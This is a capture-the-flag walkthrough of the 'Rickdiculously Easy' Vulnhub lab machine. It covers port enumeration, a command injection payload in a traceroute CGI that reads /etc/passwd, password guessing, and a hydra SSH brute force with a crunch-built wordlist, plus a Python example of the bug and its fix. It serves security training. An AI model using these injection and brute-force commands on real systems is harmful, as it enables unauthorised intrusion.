Vulnhub Walkthrough: Rickdiculously Easy: 1

Enumeration

nmap


root@kali:~/ctf/rickdiculouslyeasy# nmap -Pn -p- 10.0.2.12 -oN nmap.txt

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-10-08 14:27 EDT
Nmap scan report for 10.0.2.12
Host is up (0.00012s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
13337/tcp open unknown
22222/tcp open unknown
60000/tcp open unknown
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds

Port 60000

I decided to start looking at the higher ports first, since they appeared to be non-standard services. A quick netcat connection to port 60000 revealed a custom shell with a flag saved in a text file.


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 60000
(UNKNOWN) [10.0.2.12] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# pwd
/root/blackhole/
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
#

Port 22222

An alternate SSH service was running on port 22222.


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 22222
(UNKNOWN) [10.0.2.12] 22222 (?) open
SSH-2.0-OpenSSH_7.5

Port 13337

A custom service was running on port 13337. Connecting to it with netcat revealed the second flag.


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 13337
(UNKNOWN) [10.0.2.12] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points

Port 9090

Nikto generated a ton of false positives. Dirb found a file at https://10.0.2.12:9090/ping. I decided to try some manual enumeration. Upon navigating to the web server on 9090, the third flag was revealed.

Port 80

Nikto found a directory called passwords on the web server.


root@kali:~/ctf/rickdiculouslyeasy# nikto -h 10.0.2.12 -o nikto.txt
- Nikto v2.1.6/2.1.5
+ Target Host: 10.0.2.12
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OPTIONS Allowed HTTP Methods: POST, OPTIONS, HEAD, GET, TRACE
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: GET /passwords/: Directory indexing found.
+ OSVDB-3092: GET /passwords/: This might be interesting...
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.

Dirb also found the passwords directory, and a robots.txt file.


root@kali:~/ctf/rickdiculouslyeasy# dirb http://10.0.2.12 -o dirb.txt
...
---- Scanning URL: http://10.0.2.12/ ----
+ http://10.0.2.12/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.0.2.12/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://10.0.2.12/passwords/
+ http://10.0.2.12/robots.txt (CODE:200|SIZE:126)
...

Port 22


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 22
(UNKNOWN) [10.0.2.12] 22 (ssh) open
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
root@kali:~/ctf/rickdiculouslyeasy#

Port 21

I found that anonymous FTP access was enabled by using the ftp-anon NSE script with nmap.


root@kali:~/ctf/rickdiculouslyeasy# nmap -Pn -p 21 10.0.2.12 --script=ftp-anon

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-10-08 14:49 EDT
Nmap scan report for 10.0.2.12
Host is up (0.00026s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
root@kali:~/ctf/rickdiculouslyeasy#

Since the flag was right there, I went ahead and grabbed it.

At this point, basic enumeration was complete and I had already found 4 flags totaling 40 points.

Web Services

I spent several minutes unsuccessfully trying to fix the seemingly broken login on port 9090. I then decided to pivot to the web service on port 80.

A quick check of the /passwords/ directory revealed a passwords.html file and the 5th flag, FLAG{Yeah d- just don’t do it.} – 10 Points, in FLAG.txt.

The passwords.html file contained a message from Rick berating Morty for storing passwords in an html file. Rick did Morty a favor and hid the password in an html comment.

The robots.txt file contained another custom message from Rick. The non-standard format of the file explains why nikto didn’t detect it during its scan. The file listed two CGI scripts, root_shell.cgi and tracertool.cgi. The first one seemed like a home run, so I eagerly navigated to /cgi-bin/root_shell.cgi. To my disappointment, the root shell was still under construction…

On the other hand, tracertool.cgi appeared to be working. I followed the instructions and entered an IP address to trace. The script appeared to be running traceroute in the backend to trace a packet’s path. My immediate thought was command injection, so I tested with “127.0.0.1; cat /etc/passwd”.

Of course, the cat binary had been replaced with one that displays an ASCII art image of a cat, most likely a troll from Rick. I tried again, this time replacing “cat /etc/passwd” with “head -n 100 /etc/passwd”. It worked like a charm.

The contents of the passwd file revealed 3 user accounts on the system: RickSanchez, Morty, and Summer. I tried several variations of wget and curl to pull down a meterpreter payload through the command execution vulnerability, to no avail.
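The tracertool.cgi bug above is the textbook command injection pattern: an address typed by the user is pasted into a shell command line, so a “;” turns the address field into a second command. The Python below is an added example, not the VM’s own script, modelling that weak construction next to a hardened one (the function names and the choice of the ipaddress module for validation are mine):

```python
import ipaddress
import subprocess

# Added example: models the pattern behind the tracertool.cgi bug, not the
# actual CGI from the machine. Nothing here is executed unless run_traceroute
# is called explicitly.


def vulnerable_command_line(target: str) -> str:
    """How the broken CGI most likely built its command: the user-supplied
    target is concatenated into one shell string, so "addr; <cmd>" makes the
    shell run <cmd> after traceroute. Returned for inspection, never run."""
    return "traceroute " + target


def parse_target(target: str) -> str:
    """Return the canonical text of a single IPv4/IPv6 address or raise
    ValueError. ipaddress accepts nothing but an address, which rules out
    whitespace, shell metacharacters and chained commands in one step."""
    return str(ipaddress.ip_address(target.strip()))


def is_valid_target(target: str) -> bool:
    """Boolean wrapper around parse_target for callers that want a check."""
    try:
        parse_target(target)
        return True
    except ValueError:
        return False


def build_traceroute_argv(target: str) -> list:
    """Hardened form: validate first, then hand the address to traceroute as a
    single argv element. No shell is involved, so ';' has no meaning even if
    validation were ever loosened."""
    return ["traceroute", parse_target(target)]


def run_traceroute(target: str, timeout: int = 60) -> str:
    """Run the validated argv without a shell and with a timeout; stdout is
    returned and any error propagates for the CGI layer to report."""
    proc = subprocess.run(build_traceroute_argv(target), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


if __name__ == "__main__":
    probe = "127.0.0.1; head -n 100 /etc/passwd"   # the probe used in the walkthrough
    print("weak version would run:", vulnerable_command_line(probe))
    print("hardened version accepts it:", is_valid_target(probe))
    print("hardened argv for a real address:", build_traceroute_argv("10.0.2.12"))
```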

FTP and SSH

Since I had a list of users and a password, I decided to try to authenticate to the FTP and SSH services. I tried credentials of Morty:winter on both services with no luck. It took longer than I care to admit to recognize the connection between the user ‘Summer’ and the password ‘winter’. These credentials allowed me to successfully authenticate to the server via SSH on port 22222. I immediately discovered the 6th flag, FLAG{Get off the high road Summer!} – 10 Points, in Summer’s home directory.

As luck would have it, Summer had read access to files in both Morty and Rick’s home directories. Morty’s home directory contained two files: journal.txt.zip and Safe_Password.jpg. I copied both files to Summer’s home directory and pulled them down with ftp. I ran strings on Safe_Password.jpg to reveal the password to Morty’s password protected journal.

I used the ‘Meeseek’ password to unzip Morty’s journal. The entry from Monday referenced a ‘safe password’ and contained the 7th flag, FLAG: {131333} – 20 Points.

Moving on to RickSanchez’s home directory, I found an ELF binary called “safe” within the RICKS_SAFE directory. I copied this file to Summer’s home directory and ran it. The binary returned string output of Past Rick telling present Rick to tell future Rick to use command line arguments. I reran the binary with ‘131333’ as an argument, which uncovered flag 8, FLAG{And Awwwaaaaayyyy we Go!} – 20 Points, and hints for Rick to recover his password in case he forgot it. Rick also appears to imply that his account is a member of the wheel group.

Becoming Rick

So according to Rick, his password should begin with an uppercase letter, followed by a digit, and end with one of the words from the name of his old band. According to the Rick and Morty wiki at http://rickandmorty.wikia.com/wiki/, Rick was in a band called “The Flesh Curtains” with Birdperson and Squanchy. To generate a wordlist from these hints, I used the crunch tool.


root@kali:~/ctf/rickdiculouslyeasy# crunch 7 7 -t ,%Flesh > band_pass.txt
root@kali:~/ctf/rickdiculouslyeasy# crunch 10 10 -t ,%Curtains >> band_pass.txt

I then used hydra to brute force the RickSanchez account with the newly created wordlist.


root@kali:~/ctf/rickdiculouslyeasy# hydra -l RickSanchez -P band_pass.txt 10.0.2.12 ssh -s 22222

Becoming Root

I logged into the RickSanchez account using the password “P7Curtains”. I remembered Rick’s reference to the wheel group in his safe hints, so I ran sudo -l to check his sudo permissions. Since he could run any command as root, I sudo su’d to root.

Finally, I found the 9th and final flag, FLAG: {Ionic Defibrillator} – 30 points, in root’s home directory.

Summary

This was a fun little boot2root machine with a few twists along the way. I really enjoyed the Rick and Morty themed puzzles. Overall, this was a fun and relaxing puzzle for a rainy Sunday afternoon.

Flags Summary

#  Value  Flag                                    Location
1  10     FLAG{Whoa this is unexpected}           /var/ftp/FLAG.txt (anonymous ftp)
2  10     FLAG{Yeah d- just don’t do it.}         http://10.0.2.12/passwords/FLAG.txt
3  10     FLAG{TheyFoundMyBackDoorMorty}          Service on port 13337
4  10     FLAG{There is no Zeus, in your face!}   https://10.0.2.12:9090/
5  10     FLAG{Flip the pickle Morty!}            Rick’s half baked reverse shell (port 60000)
6  10     FLAG{Get off the high road Summer!}     /home/Summer/FLAG.txt
7  20     FLAG: {131333}                          /home/Morty/journal.txt.zip
8  20     FLAG{And Awwwaaaaayyyy we Go!}          /home/RickSanchez/RICKS_SAFE/safe 131333
9  30     FLAG: {Ionic Defibrillator}             /root/FLAG.txt
